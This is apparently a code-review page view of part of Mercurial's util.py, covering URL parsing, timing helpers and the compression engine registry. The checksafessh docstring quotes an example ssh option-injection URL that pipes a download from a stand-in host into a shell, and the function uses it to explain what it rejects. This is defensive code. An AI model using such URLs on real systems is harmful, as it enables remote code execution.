    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        # Return (url-without-credentials, auth-entry-or-None); the first
        # element is this URL serialized with user/passwd blanked out.
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            # restore the credentials even if serialization raised
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        # True when this URL cannot be joined onto a base path
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        # For file:/bundle: URLs return a filesystem path; otherwise hand
        # back the string we were originally constructed from.
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
3002
3007
def hasscheme(path):
    '''True if path parses as a URL with a scheme component.'''
    u = url(path)
    return bool(u.scheme)
3005
3010
def hasdriveletter(path):
    '''True if path starts with a Windows drive letter such as "c:".'''
    if not path:
        # preserve the falsy input (e.g. '' or None) as the result
        return path
    return path[0:1].isalpha() and path[1:2] == ':'
3008
3013
def urllocalpath(path):
    '''Return the local path of path, keeping query and fragment intact.'''
    u = url(path, parsequery=False, parsefragment=False)
    return u.localpath()
3011
3016
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    unquoted = urlreq.unquote(path)
    # a host beginning with '-' would be parsed by ssh as an option
    if unquoted.startswith(('ssh://-', 'svn+ssh://-')):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (unquoted,))
3026
3031
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
3033
3038
def removeauth(u):
    '''remove all authentication information from a url string'''
    parsed = url(u)
    parsed.user = parsed.passwd = None
    # serialize via __bytes__ like hidepassword() does; str() would produce
    # unicode on Python 3 while callers of these helpers work with bytes
    return bytes(parsed)
3039
3044
# human-readable rendering of a duration in seconds; presumably each entry
# is (threshold, divisor, format) consumed by unitcountfn — see its
# definition for the exact selection rule
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3055
3060
# current indentation (in spaces) for nested @timed reports; a one-element
# list so the closure below can mutate it
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        begin = timer()
        step = 2
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            # report even when func raised, then restore the indent level
            duration = timer() - begin
            _timenesting[0] -= step
            stderr.write('%s%s: %s\n'
                         % (' ' * _timenesting[0], func.__name__,
                            timecount(duration)))
    return wrapper
3082
3087
# unit suffixes and multipliers; order matters — longer suffixes such as
# 'kb' must be tried before the bare 'b' they end with
_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if spec.endswith(suffix):
                return int(float(spec[:-len(suffix)]) * multiplier)
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3104
3109
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, hook) pairs; sorted lazily at call time
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        # order by source name so the call sequence is deterministic
        self._hooks.sort(key=lambda entry: entry[0])
        return [hook(*args) for _source, hook in self._hooks]
3122
3127
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
        length of longest filepath+line number,
        filepath+linenumber,
        function

    Not be used in production code but very convenient while developing.
    '''
    frames = traceback.extract_stack()[:-skip - 1]
    entries = [(fileline % (fname, lineno), funcname)
               for fname, lineno, funcname, _text in frames]
    # keep only the 'depth' innermost frames; depth == 0 keeps everything
    # because [-0:] is the whole list
    entries = entries[-depth:]
    if not entries:
        return
    fnmax = max(len(fnln) for fnln, _func in entries)
    for fnln, func in entries:
        if line is None:
            yield (fnmax, fnln, func)
        else:
            yield line % (fnmax, fnln, func)
3145
3150
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    # skip + 1 hides this helper's own frame from the report
    for entry in getstackframes(skip + 1, depth=depth):
        f.write(entry)
    f.flush()
3160
3165
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if skip is not None and safehasattr(map, 'iteritems'):
            # dirstate-style mapping: only count entries whose state
            # differs from 'skip'
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # every shorter ancestor was already counted when this
                # prefix first appeared, so one bump is enough
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
3196
3201
# Prefer the C implementation of dirs when the parsers extension has one.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3199
3204
def finddirs(path):
    '''Yield each ancestor directory of a '/'-separated path, deepest first.

    A path with no '/' yields nothing.
    '''
    end = path.rfind('/')
    while end != -1:
        yield path[:end]
        end = path.rfind('/', 0, end)
3205
3210
# compression code

# Roles used when negotiating wire protocol compression.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Describes an engine's wire protocol support: its advertised name plus a
# priority for each side of the connection (higher advertises first).
compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))
3214
3219
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        # Engine name to compressionengine instance.
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        # Iterating a dict yields its keys directly; no need to
        # materialize them with .keys().
        return iter(self._engines)

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Aborts if any identifier the engine declares (name, bundle
        name/type, wire protocol type, revlog header) collides with an
        already registered engine.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def _getavailableengine(self, name):
        """Return the engine registered under internal ``name``.

        Aborts if the engine is known but cannot be loaded (e.g. an
        optional C extension is missing). Shared by the ``for*`` lookup
        methods below, which previously duplicated this logic.
        """
        engine = self._engines[name]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._getavailableengine(self._bundlenames[bundlename])

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._getavailableengine(self._bundletypes[bundletype])

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        # sorted() already returns a new list; the previous list(sorted(...))
        # wrapper was redundant.
        return sorted(engines, key=getkey)

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire protocol type.

        Will raise KeyError if the wire type isn't registered.

        Will abort if the engine is known but not available.
        """
        return self._getavailableengine(self._wiretypes[wiretype])

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()
3370
3375
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """

    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        # Engines are assumed present unless they say otherwise.
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and `decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3487
3492
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        compobj = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            out = compobj.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if out:
                yield out

        yield compobj.flush()

    def decompressorreader(self, fh):
        def gen():
            decomp = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield decomp.decompress(chunk, 2 ** 18)
                    chunk = decomp.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                # Too small for compression to pay off.
                return None

            if insize <= 1000000:
                packed = zlib.compress(data)
                return packed if len(packed) < insize else None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            compobj = zlib.compressobj()
            parts = []
            pos = 0
            while pos < insize:
                end = pos + 2 ** 20
                parts.append(compobj.compress(data[pos:end]))
                pos = end
            parts.append(compobj.flush())

            if sum(map(len, parts)) < insize:
                return ''.join(parts)
            return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())
3574
3579
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        compressor = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            out = compressor.compress(chunk)
            if out:
                yield out

        yield compressor.flush()

    def decompressorreader(self, fh):
        def gen():
            decompressor = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield decompressor.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())
3617
3622
class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # No user-facing name: this format only exists for legacy streams.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            decompressor = bz2.BZ2Decompressor()
            decompressor.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield decompressor.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())
3638
3643
class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Identity transform: the input iterator is already "compressed".
        return it

    def decompressorreader(self, fh):
        # Identity transform: nothing to decompress.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # None tells the revlog layer to store the data uncompressed.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())
3673
3678
class _zstdengine(compressionengine):
    """Compression engine backed by the bundled python-zstandard module."""

    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        # Available only if the deferred import above succeeded.
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        # Byte identifying zstd-compressed chunks in revlog storage.
        return '\x28'

    def compressstream(self, it, opts=None):
        """Yield zstd-compressed chunks for the chunks in ``it``."""
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        """Wrap ``fh`` in a reader yielding decompressed data."""
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            """Return compressed ``data`` or None if compression won't help."""
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Too small for compression to be worthwhile.
                return None
            elif insize <= 1000000:
                # One-shot compression for moderately sized payloads.
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Stream very large payloads through the compressor in
                # recommended-size chunks to bound memory usage.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            """Decompress ``data``; raises error.RevlogError on failure."""
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))
3800
3805
# Make the zstd engine available through the global registry.
compengines.register(_zstdengine())
3802
3807
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        # Engines whose backing module failed to import are omitted.
        if not engine.available():
            continue

        # Engines with no bundle representation don't belong in help output.
        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        # Preserve the original docstring/function for i18n extraction.
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items
3834
3839
# Expose the bundle-compression doc objects so i18n tooling can find and
# translate their docstrings.
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
3839
3844
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    # Try the unnumbered form first; only append a counter on collision.
    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
General Comments 0
You need to be logged in to leave comments. Login now